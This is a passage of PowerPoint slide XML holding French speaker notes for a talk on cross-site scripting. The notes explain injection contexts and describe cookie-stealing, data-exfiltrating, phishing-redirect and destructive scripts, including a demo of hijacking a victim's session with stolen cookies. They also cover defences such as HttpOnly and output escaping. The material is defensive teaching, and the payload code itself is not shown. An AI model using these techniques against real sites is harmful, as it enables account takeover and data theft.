                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ligne 11 : on peut écrire directement le script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ligne 12 : ici le but va être de fermer le lien et d’ajouter un attribut onclick</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ligne 15 : l’attaquant devra d’abord fermer le commentaire pour injecter son script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pP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78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sur cet exemple de code 3 variables et 4 contextes différents :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ligne 9 : pour injecter du JavaScript, il faut d’abord fermer la balise style</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ligne 11 : on peut écrire directement le script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ligne 12 : ici le but va être de fermer le lien et d’ajouter un attribut onclick</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ligne 15 : l’attaquant devra d’abord fermer le commentaire pour injecter son script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pP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None/>
            </a:pPr>
            <a:endParaRPr lang="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20000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ligne 15 : l’attaquant devra d’abord fermer le commentaire pour injecter son script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>J’en profite pour dire, attention aux commentaires. Il faut éviter les commentaire HTML car ils sont transmis jusqu’au client et peuvent des fois contenir des informations sensibles permettant à l’attaquant d’obtenir des informations précieuses pour mener son attaque. Préférez donc les commentaires du moteur de templating (jsp, php) qui seront uniquement visibles par le développeur et pas par l’internaute.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sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Voici le code généré. Le navigateur n’a aucun moyen de savoir qu’il ne doit pas exécuter ce code car il est totalement valide.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>En chargeant cette page, l’utilisateur verra s’afficher 3 alert et 1 dernière quand il cliquera sur le lien</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ligne 11 script et pas onclick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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Souvent dans les exemples sur internet, l’exploitation typique des XSS est d’afficher des alerts. Moi même j’ai fait des alerts dans l’exemple précédent. Mais que peut-on réellement faire avec des XSS ? La réponse est simple : à peut prêt tout ce que le navigateur nous autorise.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 - Le premier script vole les cookies de l’internaute. La portée de cette attaque dépend de la valeur des informations contenues dans les cookies. Si vos cookies servent uniquement à stocker de la configuration par exemple la couleur du texte ou autre, il n’y a pas de problème. Enfin, vous avez toujours une faille XSS, mais aucun attaquant n’aura ne raison de voler les cookies. En revanche, si vos cookies contiennent des données personnelles (nom, prénom, mail) ou des informations techniques permettant de réaliser des opérations particulières, un attaquant sera potentiellement interessé pour revendre les données (mail), ou pour s’approprier les cookies lui procurant des accès administrateur.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 - Le deuxième script vise à voler des informations en appelant une API du site. La réponse est directement envoyé sur un serveur de l’attaquant.  Il va s’exécuter avec le contexte courant de l’utilisateur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3 - Le troisième vise à rediriger silencieusement l’internaute sur un site de phising via l’instruction window.location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4 - Contrairement aux trois premiers exemples qui sont transparents pour l’utilisateur, le troisième script vise à causer du tort. Il appelle une fonctionnalité à des fins de nuir. Imaginez une faille XSS dans gmail : quelqu’un vous envoie un mail avec cette ligne, vous l’ouvrez et vous n’avez plus de mail.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tout ça pour vous dire que la portée des failles XSS est immense puisqu’il est possible de réaliser tout ce que le navigateur autorise.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Voyons par quel moyen un attaquant peut injecter ces scripts sur votre site. Soient par :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>paramètre d’url (GET)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>formulaire (POST) qui sont ensuite enregistrés dans une base de données</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>données présentes dans un cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>données présentes dans le local storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>La dernière faille XSS à laquelle j’ai été confronté était sur mon dernier projet. Elle était assez tricky à découvrir celle là.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nous utilisons, un CMS. Ce CMS héberge également les images. Lorsque les query param pour accéder à l’image n’étaient pas correct, le CMS renvoyait à la place de l’image un flux json avec un content type html indiquant le paramètre fautif ainsi que sa valeur. Firefox interprétait ce flux json et exécutait le code malveillant. Le tord est de renvoyer tel quel les paramètres de la requête sans les traiter. La deuxième erreur est le type du document, le type text/html provoquait l’exécution du script en query param. S’il le document renvoyait avait été du type json, la faille n’aurait pas existait même en l’abscence de filtrage des caractères.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Correction =&gt; demander au prestataire d’échapper la valeur du paramètre dans le json retourné et de changer le type du document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Persistant : Le script malveillant est stocké de façon permanente dans l’application (dans la base de données par exemple). Il suffit pour la victime de se rendre sur la page pour déclencher le script.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Non persistant : Le script malveillant est injecté dans le navigateur par la propre requête de l’utilisateur. Ce type d’attaque est effectuée en incitant la victime à cliquer sur un lien présent dans un mail, sur les réseaux sociaux ou sur un site pirate.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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alice navigue sur le site et visualise une fiche produit sur lequel oscar à au préalable posté un commentaire frauduleux.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Le commentaire contient un script volant les cookies via la technique du new Image().src</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fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>là alice a affiché la page et ses cookies ont été envoyé sur le serveur de OSCAR.</a:t>
            </a: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r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OSCAR :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 - ouvrir un navigateur en navigation privé</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3 - coller le script de cookie dans la partie console</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4 - voir qu’il est connecté avec le compte de alice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ce site à deux problèmes : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bien entendu la faille XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>et le cookie JESSIONID qui est accessible via du JavaScript. D’une manière générale, tout cookie qui n’a pas vocation à être manipulé en JavaScript doit avoir le flag  “HttpOnly”. Seul le serveur pourra récupérer les cookies avec ce flag. Ce qui est clairement voulu pour le JSESSIONID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Le flag HttpOnly ne corrige pas la XSS mais limite la portée des failles XSS puisque les cookies important ne peuvent plus être volés.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>La meilleure manière de se protéger des XSS est très simple : il suffit d’échapper chaque morceaux de code affiché à l’écran. Par échapper j’entends convertir les caractères spéciaux en entités HTML. Fonction </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>htmlentities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pour les amateurs de PHP. Pour information, dans les autres langages ou framework on a :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>angularjs : quand on fait {{}}. Pour afficher du texte contenant des balises il faut passer par la directive ng-bind-html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>thymeleaf : th:text vs th:utext</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jstl via la directive c:out &lt;c:out value="${param.foo}" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
